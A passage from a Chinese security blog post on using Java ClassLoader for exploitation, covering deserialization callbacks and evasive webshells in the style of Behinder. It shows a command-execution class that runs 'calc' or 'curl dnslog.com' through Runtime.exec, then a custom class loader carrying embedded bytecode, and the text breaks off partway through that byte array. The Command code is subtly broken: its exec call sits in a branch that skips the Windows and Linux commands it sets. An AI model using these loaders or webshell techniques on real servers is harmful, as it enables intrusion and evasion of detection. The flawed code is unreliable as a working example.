<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><title>Java代码审计： ClassLoader应用 | Zeo's Security Lab</title><meta name="author" content="Zeo"><meta name="copyright" content="Zeo"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="ffffff"><meta name="description" content="0x00 前提首先说明一下为啥要搞这个？ 1、挖洞 1比如挖洞的时候遇到反序列化，一般都是cc回显是将构造的回显类塞进TemplatesImpl中，如果禁用了就得找其他的方法，一般都是找ClassLoader的子类，并且实现defineClass的类。  2、webshell对抗 1类似于冰蝎的webshell也是使用自定义的ClassLoader，下面讲的方法都可以转化为webshell，这">
<meta property="og:type" content="article">
<meta property="og:title" content="Java代码审计： ClassLoader应用">
<meta property="og:url" content="https://godzeo.github.io/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/index.html">
<meta property="og:site_name" content="Zeo&#39;s Security Lab">
<meta property="og:description" content="0x00 前提首先说明一下为啥要搞这个？ 1、挖洞 1比如挖洞的时候遇到反序列化，一般都是cc回显是将构造的回显类塞进TemplatesImpl中，如果禁用了就得找其他的方法，一般都是找ClassLoader的子类，并且实现defineClass的类。  2、webshell对抗 1类似于冰蝎的webshell也是使用自定义的ClassLoader，下面讲的方法都可以转化为webshell，这">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp">
<meta property="article:published_time" content="2022-05-10T08:21:21.000Z">
<meta property="article:modified_time" content="2022-11-28T12:25:22.940Z">
<meta property="article:author" content="Zeo">
<meta property="article:tag" content="安全开发 WEB 漏洞复现和分析 java 开发语言">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp"><link rel="shortcut icon" href="/img/WX20211124-162855.png"><link rel="canonical" href="https://godzeo.github.io/2022/05/10/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%EF%BC%9A%20ClassLoader%E5%BA%94%E7%94%A8/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.min.css" media="print" onload="this.media='all'"><script>const GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: '刚刚',
    min: '分钟前',
    hour: '小时前',
    day: '天前',
    month: '个月前'
  },
  copyright: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  source: {
    justifiedGallery: {
      js: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.js',
      css: 'https://cdn.jsdelivr.net/npm/flickr-justified-gallery/dist/fjGallery.min.css'
    }
  },
  isPhotoFigcaption: false,
  islazyload: false,
  isAnchor: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'Java代码审计： ClassLoader应用',
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isToc: true,
  postUpdate: '2022-11-28 20:25:22'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(win=>{
    win.saveToLocal = {
      set: function setWithExpiry(key, value, ttl) {
        if (ttl === 0) return
        const now = new Date()
        const expiryDay = ttl * 86400000
        const item = {
          value: value,
          expiry: now.getTime() + expiryDay,
        }
        localStorage.setItem(key, JSON.stringify(item))
      },

      get: function getWithExpiry(key) {
        const itemStr = localStorage.getItem(key)

        if (!itemStr) {
          return undefined
        }
        const item = JSON.parse(itemStr)
        const now = new Date()

        if (now.getTime() > item.expiry) {
          localStorage.removeItem(key)
          return undefined
        }
        return item.value
      }
    }
  
    win.getScript = url => new Promise((resolve, reject) => {
      const script = document.createElement('script')
      script.src = url
      script.async = true
      script.onerror = reject
      script.onload = script.onreadystatechange = function() {
        const loadState = this.readyState
        if (loadState && loadState !== 'loaded' && loadState !== 'complete') return
        script.onload = script.onreadystatechange = null
        resolve()
      }
      document.head.appendChild(script)
    })
  
      win.activateDarkMode = function () {
        document.documentElement.setAttribute('data-theme', 'dark')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
        }
      }
      win.activateLightMode = function () {
        document.documentElement.setAttribute('data-theme', 'light')
        if (document.querySelector('meta[name="theme-color"]') !== null) {
          document.querySelector('meta[name="theme-color"]').setAttribute('content', 'ffffff')
        }
      }
      const t = saveToLocal.get('theme')
    
          if (t === 'dark') activateDarkMode()
          else if (t === 'light') activateLightMode()
        
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        if (asideStatus === 'hide') {
          document.documentElement.classList.add('hide-aside')
        } else {
          document.documentElement.classList.remove('hide-aside')
        }
      }
    
    const detectApple = () => {
      if(/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)){
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
    })(window)</script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="Zeo's Security Lab" type="application/atom+xml">
</head><body><div id="sidebar"><div id="menu-mask"></div><div id="sidebar-menus"><div class="avatar-img is-center"><img src="https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231013354.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="sidebar-site-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">125</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">46</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">9</div></a></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div></div></div><div class="post" id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url('https://image-1257110520.cos.ap-beijing.myqcloud.com/old/202210231225566.webp')"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">Zeo's Security Lab</a></span><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> Home</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> Archives</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> Categories</span></a></div><div class="menus_item"><a class="site-page group" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> List</span><i class="fas fa-chevron-down"></i></a><ul class="menus_item_child"><li><a class="site-page child" href="/music/"><i class="fa-fw fas fa-music"></i><span> Music</span></a></li><li><a class="site-page child" href="/movies/"><i class="fa-fw fas fa-video"></i><span> Movie</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> About</span></a></div></div><div id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></div></div></nav><div id="post-info"><h1 class="post-title">Java代码审计： ClassLoader应用</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2022-05-10T08:21:21.000Z" title="发表于 2022-05-10 16:21:21">2022-05-10</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2022-11-28T12:25:22.940Z" title="更新于 2022-11-28 20:25:22">2022-11-28</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></span></div><div class="meta-secondline"></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><span id="more"></span>

<h1 id="0x00-前提"><a href="#0x00-前提" class="headerlink" title="0x00 前提"></a>0x00 前提</h1><p>首先说明一下为啥要搞这个？</p>
<p>1、挖洞</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">比如挖洞的时候遇到反序列化，一般都是cc回显是将构造的回显类塞进TemplatesImpl中，如果禁用了就得找其他的方法，一般都是找ClassLoader的子类，并且实现defineClass的类。</span><br></pre></td></tr></table></figure>

<p>2、webshell对抗</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">类似于冰蝎的webshell也是使用自定义的ClassLoader，下面讲的方法都可以转化为webshell，这种特征都不台明显，有一定的迷惑性。</span><br></pre></td></tr></table></figure>

<p>3、漏洞利用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">还是在漏洞回显方面的问题，一般多利用 TemplatesImpl 和BECL 可以直接塞入payload直接攻击，比如常见的fastjson</span><br></pre></td></tr></table></figure>

<p>总的来说用的场景还是蛮多的，比较实用的。</p>
<h1 id="0x01-Java类基本使用"><a href="#0x01-Java类基本使用" class="headerlink" title="0x01 Java类基本使用"></a>0x01 Java类基本使用</h1><p>Java是编译型语言</p>
<p>Java是一个底层是一个<code>JVM</code>（Java虚拟机）驱动实现的跨平台的开发语言。</p>
<p>1、Java程序在运行前需要先编译成<code>class文件</code>。</p>
<p>2、Java类初始化的时候会调用<code>java.lang.ClassLoader</code>加载类字节码</p>
<p>3、<code>ClassLoader</code>会调用JVM（<code>defineClass0/defineClass1/defineClass2</code>）native方法来定义一个实例。</p>
<p>（native方法就是本地方法，底层是C写的了，我们在代码层就看不到了）</p>
<p><img src="https://img-blog.csdnimg.cn/img_convert/13313bda25f39174dac8bf18b5404b6c.png" alt="image-20220509115045243"></p>
<h2 id="ClassLoader"><a href="#ClassLoader" class="headerlink" title="ClassLoader"></a>ClassLoader</h2><p>一切的Java类都必须经过JVM加载后才能运行，而<code>ClassLoader</code>的主要作用就是Java类文件的加载。</p>
<p><code>ClassLoader</code>类有如下核心方法：</p>
<ol>
<li><code>loadClass</code>（加载指定的Java类）</li>
<li><code>findClass</code>（查找指定的Java类）</li>
<li><code>findLoadedClass</code>（查找JVM已经加载过的类）</li>
<li><code>defineClass</code>（定义一个Java类）</li>
<li><code>resolveClass</code>（链接指定的Java类）</li>
</ol>
<h2 id="ClassLoader类加载流程"><a href="#ClassLoader类加载流程" class="headerlink" title="ClassLoader类加载流程"></a>ClassLoader类加载流程</h2><blockquote>
<p>引用园长的文章，写的很好了：</p>
<p>理解Java类加载机制并非易事，这里我们以一个Java的HelloWorld来学习<code>ClassLoader</code>。</p>
<p><code>ClassLoader</code>加载<code>com.anbai.sec.classloader.TestHelloWorld</code>类重要流程如下：</p>
<ol>
<li><code>ClassLoader</code>会调用<code>public Class&lt;?&gt; loadClass(String name)</code>方法加载<code>com.anbai.sec.classloader.TestHelloWorld</code>类。</li>
<li>调用<code>findLoadedClass</code>方法检查<code>TestHelloWorld</code>类是否已经初始化，如果JVM已初始化过该类则直接返回类对象。</li>
<li>如果创建当前<code>ClassLoader</code>时传入了父类加载器（<code>new ClassLoader(父类加载器)</code>）就使用父类加载器加载<code>TestHelloWorld</code>类，否则使用JVM的<code>Bootstrap ClassLoader</code>加载。</li>
<li>如果上一步无法加载<code>TestHelloWorld</code>类，那么调用自身的<code>findClass</code>方法尝试加载<code>TestHelloWorld</code>类。</li>
<li>如果当前的<code>ClassLoader</code>没有重写了<code>findClass</code>方法，那么直接返回类加载失败异常。如果当前类重写了<code>findClass</code>方法并通过传入的<code>com.anbai.sec.classloader.TestHelloWorld</code>类名找到了对应的类字节码，那么应该调用<code>defineClass</code>方法去JVM中注册该类。</li>
<li>如果调用loadClass的时候传入的<code>resolve</code>参数为true，那么还需要调用<code>resolveClass</code>方法链接类，默认为false。</li>
<li>返回一个被JVM加载后的<code>java.lang.Class</code>类对象。</li>
</ol>
</blockquote>
<h1 id="0x02-自定义ClassLoader"><a href="#0x02-自定义ClassLoader" class="headerlink" title="0x02 自定义ClassLoader"></a>0x02 自定义ClassLoader</h1><h2 id="自定义ClassLoader"><a href="#自定义ClassLoader" class="headerlink" title="自定义ClassLoader"></a>自定义ClassLoader</h2><p><code>java.lang.ClassLoader</code>是所有的类加载器的父类，所以我们要实现一个自定义的<code>ClassLoader</code>加载器就可以直接继承就好。然后重写了<code>findClass</code>或<code>defineClass</code>者方法就好了</p>
<p>下面写一个自定义加载器实现命令执行。</p>
<p>首先写一个简单的命令执行方法：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.classloader;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.BufferedReader;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStreamReader;</span><br><span class="line"><span class="keyword">import</span> java.nio.charset.StandardCharsets;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Command</span> &#123;</span><br><span class="line">	<span class="keyword">public</span> BufferedReader <span class="title function_">execute</span><span class="params">(String args)</span> &#123;</span><br><span class="line">		<span class="type">String</span> <span class="variable">command</span> <span class="operator">=</span> args;</span><br><span class="line">	 	<span class="type">String</span> <span class="variable">osName</span>  <span class="operator">=</span> System.getProperty(<span class="string">&quot;os.name&quot;</span>);</span><br><span class="line"><span class="comment">//</span></span><br><span class="line">	 	<span class="keyword">if</span> (osName.startsWith(<span class="string">&quot;Windows&quot;</span>)) &#123;</span><br><span class="line">			 command = <span class="string">&quot;calc&quot;</span>;</span><br><span class="line">		 &#125;</span><br><span class="line">		 <span class="keyword">else</span> <span class="keyword">if</span> (osName.startsWith(<span class="string">&quot;Linux&quot;</span>)) &#123;</span><br><span class="line">	  			command = <span class="string">&quot;curl dnslog.com&quot;</span>;</span><br><span class="line">		 &#125;<span class="keyword">else</span> &#123;</span><br><span class="line">			<span class="keyword">try</span> &#123;</span><br><span class="line">				<span class="type">Process</span> <span class="variable">process</span> <span class="operator">=</span> Runtime.getRuntime().exec(command);</span><br><span class="line">				<span class="comment">// 获取命令执行结果</span></span><br><span class="line">				<span class="type">InputStream</span> <span class="variable">in</span> <span class="operator">=</span> process.getInputStream();</span><br><span class="line">				<span class="comment">//取得命令结果的输出流</span></span><br><span class="line">				<span class="type">InputStream</span> <span class="variable">inputStream</span> <span class="operator">=</span> process.getInputStream();</span><br><span class="line">				<span class="comment">//用一个读输出流类去读</span></span><br><span class="line">				<span class="type">InputStreamReader</span> <span class="variable">isr</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">InputStreamReader</span>(inputStream, StandardCharsets.UTF_8);</span><br><span class="line">				<span class="comment">//用缓冲器读行</span></span><br><span class="line">				<span class="type">BufferedReader</span> <span class="variable">br</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">BufferedReader</span>(isr);</span><br><span class="line"></span><br><span class="line">				<span class="keyword">return</span> br;</span><br><span class="line"></span><br><span class="line">			&#125; <span class="keyword">catch</span> (IOException e) &#123;</span><br><span class="line">				e.printStackTrace();</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>实验时要注意，测试的时候要把写好的Command代码都注释了再进行类加载。</p>
<p>因为如果这个类存在于我们的<code>classpath</code>中，就会直接调用了，不会进入我们的自定义类加载器中！</p>
<p>只有注释了，这个类不存在了才会进入自定义类加载器重写<code>findClass</code>方法，然后在调用<code>defineClass</code>方法，然后去调用native方法加载这个传入的类。</p>
<p>下面是例示代码</p>
<p><strong>ZeoClassLoader示例代码：</strong></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.classloader;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.BufferedReader;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Constructor;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Method;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">ZeoClassLoader</span> <span class="keyword">extends</span> <span class="title class_">ClassLoader</span> &#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 要加载的类名</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">String</span> <span class="variable">TEST_CLASS_NAME</span> <span class="operator">=</span> <span class="string">&quot;com.classloader.Command&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 要加载的类字节码</span></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="type">byte</span>[] TEST_CLASS_BYTES = <span class="keyword">new</span> <span class="title class_">byte</span>[]&#123;</span><br><span class="line">            -<span class="number">54</span>, -<span class="number">2</span>, -<span class="number">70</span>, -<span class="number">66</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">52</span>, <span class="number">0</span>, <span class="number">96</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">20</span>, <span class="number">0</span>, <span class="number">51</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">52</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">53</span>, <span class="number">0</span>, <span class="number">54</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">55</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">56</span>, <span class="number">0</span>, <span class="number">57</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">58</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">59</span>, <span class="number">8</span>, <span class="number">0</span>, <span class="number">60</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">61</span>, <span class="number">0</span>, <span class="number">62</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">61</span>, <span class="number">0</span>, <span class="number">63</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">64</span>, <span class="number">0</span>, <span class="number">65</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">66</span>, <span class="number">9</span>, <span class="number">0</span>, <span class="number">67</span>, <span class="number">0</span>, <span class="number">68</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">12</span>, <span class="number">0</span>, <span class="number">69</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">70</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">0</span>, <span class="number">71</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">72</span>, <span class="number">10</span>, <span class="number">0</span>, <span class="number">17</span>, <span class="number">0</span>, <span class="number">73</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">74</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">75</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">6</span>, <span class="number">60</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">105</span>, <span class="number">116</span>, <span class="number">62</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">40</span>, <span class="number">41</span>, <span class="number">86</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">67</span>, <span class="number">111</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">15</span>, <span class="number">76</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">101</span>, <span class="number">78</span>, <span class="number">117</span>, <span class="number">109</span>, <span class="number">98</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">84</span>, <span class="number">97</span>, <span class="number">98</span>, <span class="number">108</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">18</span>, <span class="number">76</span>, <span class="number">111</span>, <span class="number">99</span>, <span class="number">97</span>, <span class="number">108</span>, <span class="number">86</span>, <span class="number">97</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">97</span>, <span class="number">98</span>, <span class="number">108</span>, <span class="number">101</span>, <span class="number">84</span>, <span class="number">97</span>, <span class="number">98</span>, <span class="number">108</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">116</span>, <span class="number">104</span>, <span class="number">105</span>, <span class="number">115</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">25</span>, <span class="number">76</span>, <span class="number">99</span>, <span class="number">111</span>, <span class="number">109</span>, <span class="number">47</span>, <span class="number">99</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">115</span>, <span class="number">115</span>, <span class="number">108</span>, <span class="number">111</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">47</span>, <span class="number">67</span>, <span class="number">111</span>, <span class="number">109</span>, <span class="number">109</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">100</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">101</span>, <span class="number">120</span>, <span class="number">101</span>, <span class="number">99</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">44</span>, <span class="number">40</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">59</span>, <span class="number">41</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">66</span>, <span class="number">117</span>, <span class="number">102</span>, <span class="number">102</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">100</span>, <span class="number">82</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">112</span>, <span class="number">114</span>, <span class="number">111</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">115</span>, <span class="number">115</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">19</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">108</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">47</span>, <span class="number">80</span>, <span class="number">114</span>, <span class="number">111</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">115</span>, <span class="number">115</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">73</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">11</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">105</span>, <span class="number">115</span>, <span class="number">114</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">27</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">73</span>, <span class="number">110</span>, <span class="number">112</span>, <span class="number">117</span>, <span class="number">116</span>, <span class="number">83</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">109</span>, <span class="number">82</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">98</span>, <span class="number">114</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">24</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">66</span>, <span class="number">117</span>, <span class="number">102</span>, <span class="number">102</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">101</span>, <span class="number">100</span>, <span class="number">82</span>, <span class="number">101</span>, <span class="number">97</span>, <span class="number">100</span>, <span class="number">101</span>, <span class="number">114</span>, <span class="number">59</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">101</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">21</span>, <span class="number">76</span>, <span class="number">106</span>, <span class="number">97</span>, <span class="number">118</span>, <span class="number">97</span>, <span class="number">47</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">47</span>, <span class="number">73</span>, <span class="number">79</span>, <span class="number">69</span>, <span class="number">120</span>, <span class="number">99</span>, <span class="number">101</span>, <span class="number">112</span>, <span class="number">116</span>, <span class="number">105</span>, <span class="number">111</span>, <span class="number">110</span>, <span class="number">59</span>, <span class="number">1</span>, <span 